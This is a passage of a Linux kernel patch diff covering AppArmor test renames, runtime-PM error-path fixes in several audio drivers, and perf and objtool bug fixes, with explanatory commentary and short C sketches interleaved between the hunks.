+ 	KUNIT_EXPECT_FALSE(test,
+@@ -291,7 +294,7 @@ static void policy_unpack_test_unpack_strdup_with_name(struct kunit *test)
+ 	char *string = NULL;
+ 	size_t size;
+ 
+-	size = unpack_strdup(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_strdup(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_FALSE(test,
+@@ -310,7 +313,7 @@ static void policy_unpack_test_unpack_strdup_out_of_bounds(struct kunit *test)
+ 	puf->e->end = puf->e->pos + TEST_STRING_BUF_OFFSET
+ 		+ strlen(TEST_STRING_DATA) - 1;
+ 
+-	size = unpack_strdup(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_strdup(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_NULL(test, string);
+@@ -324,7 +327,7 @@ static void policy_unpack_test_unpack_nameX_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_U32, NULL);
++	success = aa_unpack_nameX(puf->e, AA_U32, NULL);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -338,7 +341,7 @@ static void policy_unpack_test_unpack_nameX_with_wrong_code(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_BLOB, NULL);
++	success = aa_unpack_nameX(puf->e, AA_BLOB, NULL);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -353,7 +356,7 @@ static void policy_unpack_test_unpack_nameX_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_U32, name);
++	success = aa_unpack_nameX(puf->e, AA_U32, name);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -368,7 +371,7 @@ static void policy_unpack_test_unpack_nameX_with_wrong_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_U32, name);
++	success = aa_unpack_nameX(puf->e, AA_U32, name);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -389,7 +392,7 @@ static void policy_unpack_test_unpack_u16_chunk_basic(struct kunit *test)
+ 	 */
+ 	puf->e->end += TEST_U16_DATA;
+ 
+-	size = unpack_u16_chunk(puf->e, &chunk);
++	size = aa_unpack_u16_chunk(puf->e, &chunk);
+ 
+ 	KUNIT_EXPECT_PTR_EQ(test, chunk,
+ 			    puf->e->start + TEST_U16_OFFSET + 2);
+@@ -406,7 +409,7 @@ static void policy_unpack_test_unpack_u16_chunk_out_of_bounds_1(
+ 
+ 	puf->e->pos = puf->e->end - 1;
+ 
+-	size = unpack_u16_chunk(puf->e, &chunk);
++	size = aa_unpack_u16_chunk(puf->e, &chunk);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_NULL(test, chunk);
+@@ -428,7 +431,7 @@ static void policy_unpack_test_unpack_u16_chunk_out_of_bounds_2(
+ 	 */
+ 	puf->e->end = puf->e->pos + TEST_U16_DATA - 1;
+ 
+-	size = unpack_u16_chunk(puf->e, &chunk);
++	size = aa_unpack_u16_chunk(puf->e, &chunk);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_NULL(test, chunk);
+@@ -443,7 +446,7 @@ static void policy_unpack_test_unpack_u32_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U32_BUF_OFFSET;
+ 
+-	success = unpack_u32(puf->e, &data, NULL);
++	success = aa_unpack_u32(puf->e, &data, NULL);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U32_DATA);
+@@ -460,7 +463,7 @@ static void policy_unpack_test_unpack_u32_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 
+-	success = unpack_u32(puf->e, &data, name);
++	success = aa_unpack_u32(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U32_DATA);
+@@ -478,7 +481,7 @@ static void policy_unpack_test_unpack_u32_out_of_bounds(struct kunit *test)
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 	puf->e->end = puf->e->start + TEST_U32_BUF_OFFSET + sizeof(u32);
+ 
+-	success = unpack_u32(puf->e, &data, name);
++	success = aa_unpack_u32(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -493,7 +496,7 @@ static void policy_unpack_test_unpack_u64_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U64_BUF_OFFSET;
+ 
+-	success = unpack_u64(puf->e, &data, NULL);
++	success = aa_unpack_u64(puf->e, &data, NULL);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U64_DATA);
+@@ -510,7 +513,7 @@ static void policy_unpack_test_unpack_u64_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U64_BUF_OFFSET;
+ 
+-	success = unpack_u64(puf->e, &data, name);
++	success = aa_unpack_u64(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U64_DATA);
+@@ -528,7 +531,7 @@ static void policy_unpack_test_unpack_u64_out_of_bounds(struct kunit *test)
+ 	puf->e->pos += TEST_NAMED_U64_BUF_OFFSET;
+ 	puf->e->end = puf->e->start + TEST_U64_BUF_OFFSET + sizeof(u64);
+ 
+-	success = unpack_u64(puf->e, &data, name);
++	success = aa_unpack_u64(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -538,7 +541,7 @@ static void policy_unpack_test_unpack_u64_out_of_bounds(struct kunit *test)
+ static void policy_unpack_test_unpack_X_code_match(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+-	bool success = unpack_X(puf->e, AA_NAME);
++	bool success = aa_unpack_X(puf->e, AA_NAME);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_TRUE(test, puf->e->pos == puf->e->start + 1);
+@@ -547,7 +550,7 @@ static void policy_unpack_test_unpack_X_code_match(struct kunit *test)
+ static void policy_unpack_test_unpack_X_code_mismatch(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+-	bool success = unpack_X(puf->e, AA_STRING);
++	bool success = aa_unpack_X(puf->e, AA_STRING);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_TRUE(test, puf->e->pos == puf->e->start);
+@@ -559,7 +562,7 @@ static void policy_unpack_test_unpack_X_out_of_bounds(struct kunit *test)
+ 	bool success;
+ 
+ 	puf->e->pos = puf->e->end;
+-	success = unpack_X(puf->e, AA_NAME);
++	success = aa_unpack_X(puf->e, AA_NAME);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ }
+@@ -605,3 +608,5 @@ static struct kunit_suite apparmor_policy_unpack_test_module = {
+ };
+ 
+ kunit_test_suite(apparmor_policy_unpack_test_module);
++
++MODULE_LICENSE("GPL");
+diff --git a/sound/pci/hda/cs35l41_hda.c b/sound/pci/hda/cs35l41_hda.c
+index a5b10a6a33a5e..c79a12e5c9ad2 100644
+--- a/sound/pci/hda/cs35l41_hda.c
++++ b/sound/pci/hda/cs35l41_hda.c
+@@ -1501,8 +1501,7 @@ int cs35l41_hda_probe(struct device *dev, const char *device_name, int id, int i
+ 	ret = component_add(cs35l41->dev, &cs35l41_hda_comp_ops);
+ 	if (ret) {
+ 		dev_err(cs35l41->dev, "Register component failed: %d\n", ret);
+-		pm_runtime_disable(cs35l41->dev);
+-		goto err;
++		goto err_pm;
+ 	}
+ 
+ 	dev_info(cs35l41->dev, "Cirrus Logic CS35L41 (%x), Revision: %02X\n", regid, reg_revid);
+@@ -1510,6 +1509,7 @@ int cs35l41_hda_probe(struct device *dev, const char *device_name, int id, int i
+ 	return 0;
+ 
+ err_pm:
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 	pm_runtime_put_noidle(cs35l41->dev);
+ 
+@@ -1528,6 +1528,7 @@ void cs35l41_hda_remove(struct device *dev)
+ 	struct cs35l41_hda *cs35l41 = dev_get_drvdata(dev);
+ 
+ 	pm_runtime_get_sync(cs35l41->dev);
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 
+ 	if (cs35l41->halo_initialized)
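
Both cs35l41 fixes in this patch address the same runtime-PM teardown bug: when probe() enabled autosuspend, the usual unwind sequence is to disable autosuspend again before pm_runtime_disable() and to drop the usage count that probe left elevated. The canonical pairing, sketched:

    /* probe side */
    pm_runtime_set_autosuspend_delay(dev, 3000);
    pm_runtime_use_autosuspend(dev);
    pm_runtime_set_active(dev);
    pm_runtime_enable(dev);

    /* error/remove side: mirror in reverse order */
    pm_runtime_dont_use_autosuspend(dev);
    pm_runtime_disable(dev);
    pm_runtime_put_noidle(dev);	/* balance the reference probe took */
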
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index 2f4b0ee93aced..e91c1a4640e46 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -374,10 +374,18 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 	struct cs35l41_private *cs35l41 = data;
+ 	unsigned int status[4] = { 0, 0, 0, 0 };
+ 	unsigned int masks[4] = { 0, 0, 0, 0 };
+-	int ret = IRQ_NONE;
+ 	unsigned int i;
++	int ret;
+ 
+-	pm_runtime_get_sync(cs35l41->dev);
++	ret = pm_runtime_resume_and_get(cs35l41->dev);
++	if (ret < 0) {
++		dev_err(cs35l41->dev,
++			"pm_runtime_resume_and_get failed in %s: %d\n",
++			__func__, ret);
++		return IRQ_NONE;
++	}
++
++	ret = IRQ_NONE;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(status); i++) {
+ 		regmap_read(cs35l41->regmap,
+@@ -1330,6 +1338,7 @@ int cs35l41_probe(struct cs35l41_private *cs35l41, const struct cs35l41_hw_cfg *
+ 	return 0;
+ 
+ err_pm:
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 	pm_runtime_put_noidle(cs35l41->dev);
+ 
+@@ -1346,6 +1355,7 @@ EXPORT_SYMBOL_GPL(cs35l41_probe);
+ void cs35l41_remove(struct cs35l41_private *cs35l41)
+ {
+ 	pm_runtime_get_sync(cs35l41->dev);
++	pm_runtime_dont_use_autosuspend(cs35l41->dev);
+ 	pm_runtime_disable(cs35l41->dev);
+ 
+ 	regmap_write(cs35l41->regmap, CS35L41_IRQ1_MASK1, 0xFFFFFFFF);
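
The IRQ-handler hunk swaps pm_runtime_get_sync() for pm_runtime_resume_and_get(). The practical difference: pm_runtime_get_sync() increments the usage count even when the resume fails, so ignoring its return value (as the old code did) can leave the count permanently elevated; pm_runtime_resume_and_get() drops its reference itself on failure, so the caller can simply bail out. The resulting shape:

    ret = pm_runtime_resume_and_get(dev);
    if (ret < 0)
        return IRQ_NONE;	/* count already balanced on failure */

    /* ... hardware is resumed; service the interrupt ... */

    pm_runtime_mark_last_busy(dev);
    pm_runtime_put_autosuspend(dev);
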
+diff --git a/sound/soc/codecs/hdmi-codec.c b/sound/soc/codecs/hdmi-codec.c
+index 0b1cdb2d60498..4d3c3365488a2 100644
+--- a/sound/soc/codecs/hdmi-codec.c
++++ b/sound/soc/codecs/hdmi-codec.c
+@@ -861,18 +861,13 @@ static int hdmi_codec_set_jack(struct snd_soc_component *component,
+ 			       void *data)
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_component_get_drvdata(component);
+-	int ret = -ENOTSUPP;
+ 
+ 	if (hcp->hcd.ops->hook_plugged_cb) {
+ 		hcp->jack = jack;
+-		ret = hcp->hcd.ops->hook_plugged_cb(component->dev->parent,
+-						    hcp->hcd.data,
+-						    plugged_cb,
+-						    component->dev);
+-		if (ret)
+-			hcp->jack = NULL;
++		return 0;
+ 	}
+-	return ret;
++
++	return -ENOTSUPP;
+ }
+ 
+ static int hdmi_dai_spdif_probe(struct snd_soc_dai *dai)
+@@ -948,6 +943,21 @@ static int hdmi_of_xlate_dai_id(struct snd_soc_component *component,
+ 	return ret;
+ }
+ 
++static int hdmi_probe(struct snd_soc_component *component)
++{
++	struct hdmi_codec_priv *hcp = snd_soc_component_get_drvdata(component);
++	int ret = 0;
++
++	if (hcp->hcd.ops->hook_plugged_cb) {
++		ret = hcp->hcd.ops->hook_plugged_cb(component->dev->parent,
++						    hcp->hcd.data,
++						    plugged_cb,
++						    component->dev);
++	}
++
++	return ret;
++}
++
+ static void hdmi_remove(struct snd_soc_component *component)
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_component_get_drvdata(component);
+@@ -958,6 +968,7 @@ static void hdmi_remove(struct snd_soc_component *component)
+ }
+ 
+ static const struct snd_soc_component_driver hdmi_driver = {
++	.probe			= hdmi_probe,
+ 	.remove			= hdmi_remove,
+ 	.dapm_widgets		= hdmi_widgets,
+ 	.num_dapm_widgets	= ARRAY_SIZE(hdmi_widgets),
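
The hdmi-codec change registers hook_plugged_cb once, at component probe, instead of on every snd_soc_component_set_jack() call; set_jack now only records where plug events should be reported. This relies on the plug callback tolerating a not-yet-set jack, roughly like the guard below (a simplified sketch, not the in-tree plugged_cb(), which also caches the ELD and jack status):

    static void plugged_cb(struct device *dev, bool plugged)
    {
        struct hdmi_codec_priv *hcp = dev_get_drvdata(dev);

        if (hcp->jack)	/* no jack registered yet: nothing to report */
            snd_soc_jack_report(hcp->jack,
                                plugged ? SND_JACK_LINEOUT : 0,
                                SND_JACK_LINEOUT);
    }
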
+diff --git a/sound/soc/fsl/fsl_easrc.c b/sound/soc/fsl/fsl_easrc.c
+index 3153d19136b29..84e6f9eb784dc 100644
+--- a/sound/soc/fsl/fsl_easrc.c
++++ b/sound/soc/fsl/fsl_easrc.c
+@@ -1966,17 +1966,21 @@ static int fsl_easrc_probe(struct platform_device *pdev)
+ 					      &fsl_easrc_dai, 1);
+ 	if (ret) {
+ 		dev_err(dev, "failed to register ASoC DAI\n");
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	ret = devm_snd_soc_register_component(dev, &fsl_asrc_component,
+ 					      NULL, 0);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to register ASoC platform\n");
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	return 0;
++
++err_pm_disable:
++	pm_runtime_disable(&pdev->dev);
++	return ret;
+ }
+ 
+ static int fsl_easrc_remove(struct platform_device *pdev)
+diff --git a/sound/soc/fsl/mpc5200_dma.c b/sound/soc/fsl/mpc5200_dma.c
+index 9014978100207..3f7ccae3f6b1a 100644
+--- a/sound/soc/fsl/mpc5200_dma.c
++++ b/sound/soc/fsl/mpc5200_dma.c
+@@ -100,6 +100,9 @@ static irqreturn_t psc_dma_bcom_irq(int irq, void *_psc_dma_stream)
+ 
+ /**
+  * psc_dma_trigger: start and stop the DMA transfer.
++ * @component: triggered component
++ * @substream: triggered substream
++ * @cmd: triggered command
+  *
+  * This function is called by ALSA to start, stop, pause, and resume the DMA
+  * transfer of data.
+diff --git a/sound/soc/intel/skylake/skl-sst-utils.c b/sound/soc/intel/skylake/skl-sst-utils.c
+index 57ea815d3f041..b776c58dcf47a 100644
+--- a/sound/soc/intel/skylake/skl-sst-utils.c
++++ b/sound/soc/intel/skylake/skl-sst-utils.c
+@@ -299,6 +299,7 @@ int snd_skl_parse_uuids(struct sst_dsp *ctx, const struct firmware *fw,
+ 		module->instance_id = devm_kzalloc(ctx->dev, size, GFP_KERNEL);
+ 		if (!module->instance_id) {
+ 			ret = -ENOMEM;
++			kfree(module);
+ 			goto free_uuid_list;
+ 		}
+ 
+diff --git a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+index 6babadb2e6fe2..f76bae1d81a09 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
++++ b/sound/soc/mediatek/mt8186/mt8186-mt6366-rt1019-rt5682s.c
+@@ -1080,7 +1080,7 @@ static int mt8186_mt6366_rt1019_rt5682s_dev_probe(struct platform_device *pdev)
+ 	playback_codec = of_get_child_by_name(pdev->dev.of_node, "playback-codecs");
+ 	if (!playback_codec) {
+ 		ret = -EINVAL;
+-		dev_err_probe(&pdev->dev, ret, "Property 'speaker-codecs' missing or invalid\n");
++		dev_err_probe(&pdev->dev, ret, "Property 'playback-codecs' missing or invalid\n");
+ 		goto err_playback_codec;
+ 	}
+ 
+@@ -1094,7 +1094,7 @@ static int mt8186_mt6366_rt1019_rt5682s_dev_probe(struct platform_device *pdev)
+ 	for_each_card_prelinks(card, i, dai_link) {
+ 		ret = mt8186_mt6366_card_set_be_link(card, dai_link, playback_codec, "I2S3");
+ 		if (ret) {
+-			dev_err_probe(&pdev->dev, ret, "%s set speaker_codec fail\n",
++			dev_err_probe(&pdev->dev, ret, "%s set playback_codec fail\n",
+ 				      dai_link->name);
+ 			goto err_probe;
+ 		}
+diff --git a/sound/soc/soc-dapm.c b/sound/soc/soc-dapm.c
+index 879cf1be67a9f..6eb8c6cb5e673 100644
+--- a/sound/soc/soc-dapm.c
++++ b/sound/soc/soc-dapm.c
+@@ -3670,7 +3670,7 @@ snd_soc_dapm_new_control_unlocked(struct snd_soc_dapm_context *dapm,
+ 		dapm_pinctrl_event(w, NULL, SND_SOC_DAPM_POST_PMD);
+ 		break;
+ 	case snd_soc_dapm_clock_supply:
+-		w->clk = devm_clk_get(dapm->dev, w->name);
++		w->clk = devm_clk_get(dapm->dev, widget->name);
+ 		if (IS_ERR(w->clk)) {
+ 			ret = PTR_ERR(w->clk);
+ 			goto request_failed;
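
The soc-dapm fix is subtle: by this point in snd_soc_dapm_new_control_unlocked(), `w->name` may already carry the component's DAPM name_prefix, while `widget->name` is the unprefixed template name the driver declared, and the clock is registered under the template name. With a prefix in play the old lookup could never match. Illustration, assuming name_prefix = "Left" and a clock-supply widget template named "mclk":

    /*
     * widget->name == "mclk"       - template name, matches the clock
     * w->name      == "Left mclk"  - runtime name with prefix applied
     * so the clock lookup must use the template name:
     */
    w->clk = devm_clk_get(dapm->dev, widget->name);
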
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index eaa16755a2704..93e1c38392a32 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -434,9 +434,10 @@ int snd_sof_device_remove(struct device *dev)
+ 	struct snd_sof_dev *sdev = dev_get_drvdata(dev);
+ 	struct snd_sof_pdata *pdata = sdev->pdata;
+ 	int ret;
++	bool aborted = false;
+ 
+ 	if (IS_ENABLED(CONFIG_SND_SOC_SOF_PROBE_WORK_QUEUE))
+-		cancel_work_sync(&sdev->probe_work);
++		aborted = cancel_work_sync(&sdev->probe_work);
+ 
+ 	/*
+ 	 * Unregister any registered client device first before IPC and debugfs
+@@ -462,6 +463,9 @@ int snd_sof_device_remove(struct device *dev)
+ 		snd_sof_free_debug(sdev);
+ 		snd_sof_remove(sdev);
+ 		sof_ops_free(sdev);
++	} else if (aborted) {
++		/* probe_work never ran */
++		sof_ops_free(sdev);
+ 	}
+ 
+ 	/* release firmware */
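
cancel_work_sync() returns true when the work item was still pending, i.e. it was cancelled before it ever ran. For SOF's deferred probe that means none of the probe-work-side setup or teardown happened, so snd_sof_device_remove() has to free the DSP ops itself or the allocation leaks. The idiom, with probe_ran() as a hypothetical stand-in for the sdev state checks in the surrounding code:

    bool aborted = cancel_work_sync(&sdev->probe_work);

    if (!probe_ran(sdev) && aborted)
        sof_ops_free(sdev);	/* the cancelled work would have owned this */
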
+diff --git a/sound/soc/ti/ams-delta.c b/sound/soc/ti/ams-delta.c
+index 438e2fa843a03..1acc4505aa9a9 100644
+--- a/sound/soc/ti/ams-delta.c
++++ b/sound/soc/ti/ams-delta.c
+@@ -303,7 +303,7 @@ static int cx81801_open(struct tty_struct *tty)
+ static void cx81801_close(struct tty_struct *tty)
+ {
+ 	struct snd_soc_component *component = tty->disc_data;
+-	struct snd_soc_dapm_context *dapm = &component->card->dapm;
++	struct snd_soc_dapm_context *dapm;
+ 
+ 	del_timer_sync(&cx81801_timer);
+ 
+@@ -315,6 +315,8 @@ static void cx81801_close(struct tty_struct *tty)
+ 
+ 	v253_ops.close(tty);
+ 
++	dapm = &component->card->dapm;
++
+ 	/* Revert back to default audio input/output constellation */
+ 	snd_soc_dapm_mutex_lock(dapm);
+ 
+diff --git a/tools/iio/iio_generic_buffer.c b/tools/iio/iio_generic_buffer.c
+index 44bbf80f0cfdd..0d0a7a19d6f95 100644
+--- a/tools/iio/iio_generic_buffer.c
++++ b/tools/iio/iio_generic_buffer.c
+@@ -54,9 +54,12 @@ enum autochan {
+ static unsigned int size_from_channelarray(struct iio_channel_info *channels, int num_channels)
+ {
+ 	unsigned int bytes = 0;
+-	int i = 0;
++	int i = 0, max = 0;
++	unsigned int misalignment;
+ 
+ 	while (i < num_channels) {
++		if (channels[i].bytes > max)
++			max = channels[i].bytes;
+ 		if (bytes % channels[i].bytes == 0)
+ 			channels[i].location = bytes;
+ 		else
+@@ -66,6 +69,14 @@ static unsigned int size_from_channelarray(struct iio_channel_info *channels, in
+ 		bytes = channels[i].location + channels[i].bytes;
+ 		i++;
+ 	}
++	/*
++	 * We want the data in the next sample to also be properly aligned,
++	 * so we'll add padding at the end if needed. Adding padding only
++	 * works for channel data whose size is 2^n bytes.
++	 */
++	misalignment = bytes % max;
++	if (misalignment)
++		bytes += max - misalignment;
+ 
+ 	return bytes;
+ }
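
Worked example of the new tail-padding math: channels of 4, 2 and 1 bytes are placed at offsets 0, 4 and 6, so the loop ends with bytes = 7; max = 4, the misalignment is 7 % 4 = 3, and 4 - 3 = 1 byte of padding rounds the record to 8, keeping the next sample's 4-byte channel naturally aligned. As straight-line arithmetic:

    /* hypothetical scan with channel sizes 4, 2, 1 */
    unsigned int bytes = 7;			/* end of last channel */
    unsigned int max = 4;			/* widest channel */
    unsigned int misalignment = bytes % max;	/* 7 % 4 == 3 */

    if (misalignment)
        bytes += max - misalignment;		/* 7 + 1 == 8 */
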
+diff --git a/tools/objtool/objtool.c b/tools/objtool/objtool.c
+index a7ecc32e35125..cda649644e32d 100644
+--- a/tools/objtool/objtool.c
++++ b/tools/objtool/objtool.c
+@@ -146,7 +146,5 @@ int main(int argc, const char **argv)
+ 	exec_cmd_init("objtool", UNUSED, UNUSED, UNUSED);
+ 	pager_init(UNUSED);
+ 
+-	objtool_run(argc, argv);
+-
+-	return 0;
++	return objtool_run(argc, argv);
+ }
+diff --git a/tools/perf/Documentation/perf-kwork.txt b/tools/perf/Documentation/perf-kwork.txt
+index 3c36324712b6e..482d6c52e2edf 100644
+--- a/tools/perf/Documentation/perf-kwork.txt
++++ b/tools/perf/Documentation/perf-kwork.txt
+@@ -8,7 +8,7 @@ perf-kwork - Tool to trace/measure kernel work properties (latencies)
+ SYNOPSIS
+ --------
+ [verse]
+-'perf kwork' {record}
++'perf kwork' {record|report|latency|timehist}
+ 
+ DESCRIPTION
+ -----------
+diff --git a/tools/perf/builtin-kwork.c b/tools/perf/builtin-kwork.c
+index fb8c63656ad89..25cba0d61736c 100644
+--- a/tools/perf/builtin-kwork.c
++++ b/tools/perf/builtin-kwork.c
+@@ -399,12 +399,14 @@ static int work_push_atom(struct perf_kwork *kwork,
+ 
+ 	work = work_findnew(&class->work_root, &key, &kwork->cmp_id);
+ 	if (work == NULL) {
+-		free(atom);
++		atom_free(atom);
+ 		return -1;
+ 	}
+ 
+-	if (!profile_event_match(kwork, work, sample))
++	if (!profile_event_match(kwork, work, sample)) {
++		atom_free(atom);
+ 		return 0;
++	}
+ 
+ 	if (dst_type < KWORK_TRACE_MAX) {
+ 		dst_atom = list_last_entry_or_null(&work->atom_list[dst_type],
+@@ -1670,9 +1672,10 @@ int cmd_kwork(int argc, const char **argv)
+ 	static struct perf_kwork kwork = {
+ 		.class_list          = LIST_HEAD_INIT(kwork.class_list),
+ 		.tool = {
+-			.mmap    = perf_event__process_mmap,
+-			.mmap2   = perf_event__process_mmap2,
+-			.sample  = perf_kwork__process_tracepoint_sample,
++			.mmap		= perf_event__process_mmap,
++			.mmap2		= perf_event__process_mmap2,
++			.sample		= perf_kwork__process_tracepoint_sample,
++			.ordered_events = true,
+ 		},
+ 		.atom_page_list      = LIST_HEAD_INIT(kwork.atom_page_list),
+ 		.sort_list           = LIST_HEAD_INIT(kwork.sort_list),
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index a2c74a34e4a44..bdd8dd54fdb63 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -1444,7 +1444,7 @@ static int perf_stat_init_aggr_mode(void)
+ 	 * taking the highest cpu number to be the size of
+ 	 * the aggregation translate cpumap.
+ 	 */
+-	if (evsel_list->core.user_requested_cpus)
++	if (!perf_cpu_map__empty(evsel_list->core.user_requested_cpus))
+ 		nr = perf_cpu_map__max(evsel_list->core.user_requested_cpus).cpu;
+ 	else
+ 		nr = 0;
+diff --git a/tools/perf/util/bpf_off_cpu.c b/tools/perf/util/bpf_off_cpu.c
+index 01f70b8e705a8..21f4d9ba023d9 100644
+--- a/tools/perf/util/bpf_off_cpu.c
++++ b/tools/perf/util/bpf_off_cpu.c
+@@ -98,7 +98,7 @@ static void off_cpu_finish(void *arg __maybe_unused)
+ /* v5.18 kernel added prev_state arg, so it needs to check the signature */
+ static void check_sched_switch_args(void)
+ {
+-	const struct btf *btf = bpf_object__btf(skel->obj);
++	const struct btf *btf = btf__load_vmlinux_btf();
+ 	const struct btf_type *t1, *t2, *t3;
+ 	u32 type_id;
+ 
+@@ -116,7 +116,8 @@ static void check_sched_switch_args(void)
+ 		return;
+ 
+ 	t3 = btf__type_by_id(btf, t2->type);
+-	if (t3 && btf_is_func_proto(t3) && btf_vlen(t3) == 4) {
++	/* btf_trace func proto has one more argument for the context */
++	if (t3 && btf_is_func_proto(t3) && btf_vlen(t3) == 5) {
+ 		/* new format: pass prev_state as 4th arg */
+ 		skel->rodata->has_prev_state = true;
+ 	}
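
For context, a hedged sketch of what the corrected probe does with libbpf's BTF API: the btf_trace_sched_switch typedef resolves to a pointer to a func proto, and its vlen counts the tracepoint arguments plus the hidden context argument, hence the comparison against 5. The function name is hypothetical and error handling is condensed.

#include <stdbool.h>
#include <bpf/btf.h>

static bool sched_switch_has_prev_state(void)
{
	struct btf *btf = btf__load_vmlinux_btf();
	const struct btf_type *t;
	bool ret = false;
	__s32 id;

	if (!btf)
		return false;

	id = btf__find_by_name_kind(btf, "btf_trace_sched_switch",
				    BTF_KIND_TYPEDEF);
	if (id < 0)
		goto out;

	t = btf__type_by_id(btf, id);		/* the typedef */
	if (!t)
		goto out;
	t = btf__type_by_id(btf, t->type);	/* pointer type */
	if (!t)
		goto out;
	t = btf__type_by_id(btf, t->type);	/* func proto */

	/* 4 tracepoint args plus one context arg makes a vlen of 5 */
	ret = t && btf_is_func_proto(t) && btf_vlen(t) == 5;
out:
	btf__free(btf);
	return ret;
}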
+diff --git a/tools/perf/util/hist.c b/tools/perf/util/hist.c
+index 17a05e943b44b..bffd058cbecee 100644
+--- a/tools/perf/util/hist.c
++++ b/tools/perf/util/hist.c
+@@ -2645,8 +2645,6 @@ void hist__account_cycles(struct branch_stack *bs, struct addr_location *al,
+ 
+ 	/* If we have branch cycles always annotate them. */
+ 	if (bs && bs->nr && entries[0].flags.cycles) {
+-		int i;
+-
+ 		bi = sample__resolve_bstack(sample, al);
+ 		if (bi) {
+ 			struct addr_map_symbol *prev = NULL;
+@@ -2661,7 +2659,7 @@ void hist__account_cycles(struct branch_stack *bs, struct addr_location *al,
+ 			 * Note that perf stores branches reversed from
+ 			 * program order!
+ 			 */
+-			for (i = bs->nr - 1; i >= 0; i--) {
++			for (int i = bs->nr - 1; i >= 0; i--) {
+ 				addr_map_symbol__account_cycles(&bi[i].from,
+ 					nonany_branch_mode ? NULL : prev,
+ 					bi[i].flags.cycles);
+@@ -2670,6 +2668,12 @@ void hist__account_cycles(struct branch_stack *bs, struct addr_location *al,
+ 				if (total_cycles)
+ 					*total_cycles += bi[i].flags.cycles;
+ 			}
++			for (unsigned int i = 0; i < bs->nr; i++) {
++				map__put(bi[i].to.ms.map);
++				maps__put(bi[i].to.ms.maps);
++				map__put(bi[i].from.ms.map);
++				maps__put(bi[i].from.ms.maps);
++			}
+ 			free(bi);
+ 		}
+ 	}
+diff --git a/tools/perf/util/machine.c b/tools/perf/util/machine.c
+index 76316e459c3de..9cd52f50ea7ac 100644
+--- a/tools/perf/util/machine.c
